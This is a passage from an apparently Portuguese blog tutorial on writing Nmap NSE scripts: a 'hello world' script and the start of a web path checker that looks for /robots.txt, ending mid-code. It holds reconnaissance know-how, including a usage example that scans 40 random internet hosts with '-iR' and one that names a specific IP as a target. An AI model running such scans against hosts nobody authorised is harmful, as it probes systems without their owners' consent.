<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
description <span class="sy0" style="color: #66cc66;">=</span> <span class="br0" style="color: #66cc66;">[</span><span class="br0" style="color: #66cc66;">[</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
Author<span class="sy0" style="color: #66cc66;">:</span> r00t<span class="sy0" style="color: #66cc66;">-</span>3xp10it</div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
INURLBR AULA <span class="sy0" style="color: #66cc66;">-</span> escrevendo o meu primeiro script NSE para o nmap</div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
Some Syntax examples<span class="sy0" style="color: #66cc66;">:</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
nmap <span class="co1" style="color: grey; font-style: italic;">--script-help hello.nse</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
nmap <span class="sy0" style="color: #66cc66;">-</span>sS <span class="sy0" style="color: #66cc66;">-</span>Pn <span class="sy0" style="color: #66cc66;">-</span>p <span class="nu0" style="color: #cc66cc;">80</span> <span class="co1" style="color: grey; font-style: italic;">--script hello.nse <target></span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="br0" style="color: #66cc66;">]</span><span class="br0" style="color: #66cc66;">]</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
author <span class="sy0" style="color: #66cc66;">=</span> <span class="st0" style="color: #ff6666;">"r00t-3xp10it"</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
categories <span class="sy0" style="color: #66cc66;">=</span> <span class="br0" style="color: #66cc66;">{</span><span class="st0" style="color: #ff6666;">"discovery"</span><span class="sy0" style="color: #66cc66;">,</span> <span class="st0" style="color: #ff6666;">"safe"</span><span class="br0" style="color: #66cc66;">}</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="co1" style="color: grey; font-style: italic;">------------------------------ Dependencies ------------------------------</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">local</span> http <span class="sy0" style="color: #66cc66;">=</span> <span class="kw3" style="color: #0000aa;">require</span> <span class="st0" style="color: #ff6666;">"http"</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">local</span> shortport <span class="sy0" style="color: #66cc66;">=</span> <span class="kw3" style="color: #0000aa;">require</span> <span class="st0" style="color: #ff6666;">"shortport"</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="co1" style="color: grey; font-style: italic;">------------------------------ The Rule Section ------------------------------</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
portrule <span class="sy0" style="color: #66cc66;">=</span> shortport<span class="sy0" style="color: #66cc66;">.</span>http</div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="co1" style="color: grey; font-style: italic;">------------------------------ The Action Section ------------------------------</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
action <span class="sy0" style="color: #66cc66;">=</span> <span class="kw1" style="color: #aa9900; font-weight: bold;">function</span><span class="br0" style="color: #66cc66;">(</span>host<span class="sy0" style="color: #66cc66;">,</span> port<span class="br0" style="color: #66cc66;">)</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">return</span> <span class="st0" style="color: #ff6666;">"Hello world!"</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">end</span></div>
</li>
</ol>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: red;">Descrição: </span>na secção 'head' definimos a categoria como 'discovery and safe', para correr este script e todos contidos na categoria 'discovery' basta executarmos 'nmap -sV -p 80,8080 --script discovery <target>', na secção 'Dependencies' chamamos as bibliotecas 'http & shortport', na secção 'the rule section' vamos nos servir da biblioteca 'shortport' para verificar se o <target> está a correr alguma porta com o protocol 'http' abertas, para podermos executar a secção 'the action section' a 'funtion(host, port)' vai executar o command "hello world!" (display no terminal), P.S. a portrule 'shortport.http' verifica todos os protocolos http based, like<span style="color: red;">:</span> <span style="white-space: pre-wrap;">http, https, ipp, http-alt, https-alt, vnc-http, oem-agent, </span><span style="white-space: pre-wrap;">soap, http-proxy, (descrição da biblioteca 'shortport.lua')</span>...</div>
<div class="separator" style="clear: both; text-align: center;">
<span style="color: red;">shortport.http:</span> <a href="https://nmap.org/nsedoc/lib/shortport.html#http" target="_blank">https://nmap.org/nsedoc/lib/shortport.html#http</a></div>
<div style="text-align: -webkit-center;">
<span style="font-size: large;"></span><span style="color: red;">shortport.lua:</span> <a href="https://svn.nmap.org/nmap/nselib/shortport.lua" target="_blank">nmap.org/nmap/nselib/shortport.lua</a><br />
<br />
<center>
<span style="font-size: large;">hello.nse output:</span></center>
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdTYSjzAFkbV0_AMZLRYQnr_wP0JnEv6aZUKo_u5WqRo99XmIBKjQgxV8zSM0eVqfFBlKfVvJOxjDtXedyafdnAIDS5oGhTQQUn6l82CSNRzjNEMkWr_HVfRUiB5rNC97bqkp3OkuBzok/s1600/aula1-output.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdTYSjzAFkbV0_AMZLRYQnr_wP0JnEv6aZUKo_u5WqRo99XmIBKjQgxV8zSM0eVqfFBlKfVvJOxjDtXedyafdnAIDS5oGhTQQUn6l82CSNRzjNEMkWr_HVfRUiB5rNC97bqkp3OkuBzok/s640/aula1-output.png" width="640" /></a></div>
<div style="text-align: justify;">
<div style="text-align: center;">
<b>exporte o script para a base de dados do nmap</b> ('/nmap/scripts/' folder)</div>
</div>
<div style="text-align: justify;">
<div style="text-align: center;">
sudo cp hello.nse /usr/share/nmap/scripts/hello.nse</div>
</div>
<div style="text-align: justify;">
<div style="text-align: center;">
<b>actualize a base de dados do NSE</b></div>
</div>
<div style="text-align: justify;">
<div style="text-align: center;">
sudo nmap --script-updatedb</div>
</div>
<div style="text-align: justify;">
<div style="text-align: center;">
<b>visualizar a descrição do modulo</b></div>
</div>
<div style="text-align: justify;">
<div style="text-align: center;">
sudo nmap --script-help hello.nse</div>
</div>
<div style="text-align: justify;">
<div style="text-align: center;">
<b>corra o script</b></div>
</div>
<div style="text-align: justify;">
<div style="text-align: center;">
sudo nmap -sV -Pn -p 80,443,445,8080 --script hello.nse <target></div>
<br /></div>
<div style="text-align: -webkit-center;">
<h2>
<span style="color: red; font-size: large;">file-checker.nse</span></h2>
</div>
Vamos construir um Script NSE rápido para verificar se o /path/arquivo/pasta selecionado existe no alvo webserver verificando os codigos de retorno da API do google. "o comportamento padrão será procurar o arquivo robots.txt se não for introduzido um argumento (@args) para procurar um file/path diferente", os '@argumentos' são lançados pela 'flag' --script-args <nome do argumento>= neste caso vai servir para pedir ao utilizador para entrar um nome diferente do valor default (/robots.txt) a procurar no target, vamos construir o proximo script em 4 secções 'head, dependencies, the rules section, the action section' para mais facil compreenção:<br />
<br />
<br />
<center>
---'THE HEAD SECTION'---</center>
<ol style="background-color: #f8f8f8; color: #acacac; font-family: Consolas, Menlo, Monaco, 'Lucida Console', 'Liberation Mono', 'DejaVu Sans Mono', 'Bitstream Vera Sans Mono', monospace, serif; font-size: 12px; line-height: 21px; margin: 0px; padding: 0px 0px 0px 48px;">
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
description <span class="sy0" style="color: #66cc66;">=</span> <span class="br0" style="color: #66cc66;">[</span><span class="br0" style="color: #66cc66;">[</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
Author<span class="sy0" style="color: #66cc66;">:</span> r00t<span class="sy0" style="color: #66cc66;">-</span>3xp10it</div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
Quick NSE script to check <span class="kw1" style="color: #aa9900; font-weight: bold;">if</span> the selected file<span class="sy0" style="color: #66cc66;">/</span>path<span class="sy0" style="color: #66cc66;">/</span>folder exists</div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
on target webserver by checking google API <span class="kw1" style="color: #aa9900; font-weight: bold;">return</span> codes<span class="sy0" style="color: #66cc66;">.</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="st0" style="color: #ff6666;">'default behavior its to search for robots.txt file'</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
Some Syntax examples<span class="sy0" style="color: #66cc66;">:</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
nmap <span class="sy0" style="color: #66cc66;">-</span>sS <span class="sy0" style="color: #66cc66;">-</span>Pn <span class="sy0" style="color: #66cc66;">-</span>p <span class="nu0" style="color: #cc66cc;">80</span> <span class="co1" style="color: grey; font-style: italic;">--script file-checker.nse <target></span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
nmap <span class="sy0" style="color: #66cc66;">-</span>sS <span class="sy0" style="color: #66cc66;">-</span>Pn <span class="sy0" style="color: #66cc66;">-</span>p <span class="nu0" style="color: #cc66cc;">80</span> <span class="co1" style="color: grey; font-style: italic;">--script file-checker.nse --script-args file=/privacy/ <target></span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
nmap <span class="sy0" style="color: #66cc66;">-</span>sS <span class="sy0" style="color: #66cc66;">-</span>sV <span class="sy0" style="color: #66cc66;">-</span>iR <span class="nu0" style="color: #cc66cc;">40</span> <span class="sy0" style="color: #66cc66;">-</span>p <span class="nu0" style="color: #cc66cc;">80</span> <span class="co1" style="color: grey; font-style: italic;">--open --script file-checker.nse --script-args file=/robots.txt</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="br0" style="color: #66cc66;">]</span><span class="br0" style="color: #66cc66;">]</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="co1" style="color: grey; font-style: italic;">---</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="co1" style="color: grey; font-style: italic;">-- @usage</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="co1" style="color: grey; font-style: italic;">-- nmap --script-help file-checker.nse</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="co1" style="color: grey; font-style: italic;">-- nmap -sS -Pn -p 80 --script file-checker.nse <target></span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="co1" style="color: grey; font-style: italic;">-- nmap -sS -Pn -p 80 --script file-checker.nse --script-args file=/robots.txt <target></span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="co1" style="color: grey; font-style: italic;">-- nmap -sS -Pn -p 80 --script file-checker.nse --script-args file=/privacy/ 113.38.34.72</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="co1" style="color: grey; font-style: italic;">-- @output</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="co1" style="color: grey; font-style: italic;">-- PORT STATE SERVICE</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="co1" style="color: grey; font-style: italic;">-- 80/tcp open http</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="co1" style="color: grey; font-style: italic;">-- | file-checker: /robots.txt</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="co1" style="color: grey; font-style: italic;">-- | : STRING FOUND...</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="co1" style="color: grey; font-style: italic;">-- |_ : returned 200 OK</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="co1" style="color: grey; font-style: italic;">-- @args file-checker.file the file/path name to search. Default: /robots.txt</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="co1" style="color: grey; font-style: italic;">---</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
author <span class="sy0" style="color: #66cc66;">=</span> <span class="st0" style="color: #ff6666;">"r00t-3xp10it"</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
license <span class="sy0" style="color: #66cc66;">=</span> <span class="st0" style="color: #ff6666;">"Same as Nmap--See http://nmap.org/book/man-legal.html"</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
categories <span class="sy0" style="color: #66cc66;">=</span> <span class="br0" style="color: #66cc66;">{</span><span class="st0" style="color: #ff6666;">"discovery"</span><span class="sy0" style="color: #66cc66;">,</span> <span class="st0" style="color: #ff6666;">"safe"</span><span class="br0" style="color: #66cc66;">}</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="br0" style="color: #66cc66;"><br /></span></div>
</li>
</ol>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<b>---'DEPENDENCIES'---</b></div>
<ol style="background-color: #f8f8f8; color: #acacac; font-family: Consolas, Menlo, Monaco, 'Lucida Console', 'Liberation Mono', 'DejaVu Sans Mono', 'Bitstream Vera Sans Mono', monospace, serif; font-size: 12px; line-height: 21px; margin: 0px; padding: 0px 0px 0px 48px;">
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="co1" style="color: grey; font-style: italic;">-- Dependencies (lua libraries)</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">local</span> shortport <span class="sy0" style="color: #66cc66;">=</span> <span class="kw3" style="color: #0000aa;">require</span> <span class="st0" style="color: #ff6666;">"shortport"</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">local</span> stdnse <span class="sy0" style="color: #66cc66;">=</span> <span class="kw3" style="color: #0000aa;">require</span> <span class="br0" style="color: #66cc66;">(</span><span class="st0" style="color: #ff6666;">'stdnse'</span><span class="br0" style="color: #66cc66;">)</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">local</span> http <span class="sy0" style="color: #66cc66;">=</span> <span class="kw3" style="color: #0000aa;">require</span> <span class="st0" style="color: #ff6666;">"http"</span></div>
</li>
</ol>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<span style="color: red;">shortport:</span> <a href="https://nmap.org/nsedoc/lib/shortport.html" target="_blank">https://nmap.org/nsedoc/lib/shortport.html</a></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="color: red;">stdnse: <a href="https://nmap.org/nsedoc/lib/stdnse.html" target="_blank">https://nmap.org/nsedoc/lib/stdnse.html</a></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="color: red;">http: <a href="https://nmap.org/nsedoc/lib/http.html" target="_blank">https://nmap.org/nsedoc/lib/http.html</a> </span></div>
<br />
<span style="text-align: center;"></span><br />
<br />
<center>
<span style="text-align: center;"><b>---'THE RULES SECTION'---</b></span></center>
<center>
<ol style="background-color: #f8f8f8; color: #acacac; font-family: Consolas, Menlo, Monaco, 'Lucida Console', 'Liberation Mono', 'DejaVu Sans Mono', 'Bitstream Vera Sans Mono', monospace, serif; font-size: 12px; line-height: 21px; margin: 0px; padding: 0px 0px 0px 48px; text-align: start;">
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="co1" style="color: grey; font-style: italic;">-- Port rule will only execute if port 80/tcp http is open</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
portrule <span class="sy0" style="color: #66cc66;">=</span> shortport<span class="sy0" style="color: #66cc66;">.</span>port_or_service<span class="br0" style="color: #66cc66;">(</span><span class="br0" style="color: #66cc66;">{</span><span class="nu0" style="color: #cc66cc;">80</span><span class="br0" style="color: #66cc66;">}</span><span class="sy0" style="color: #66cc66;">,</span> <span class="st0" style="color: #ff6666;">"http"</span><span class="sy0" style="color: #66cc66;">,</span> <span class="st0" style="color: #ff6666;">"tcp"</span><span class="sy0" style="color: #66cc66;">,</span> <span class="st0" style="color: #ff6666;">"open"</span><span class="br0" style="color: #66cc66;">)</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
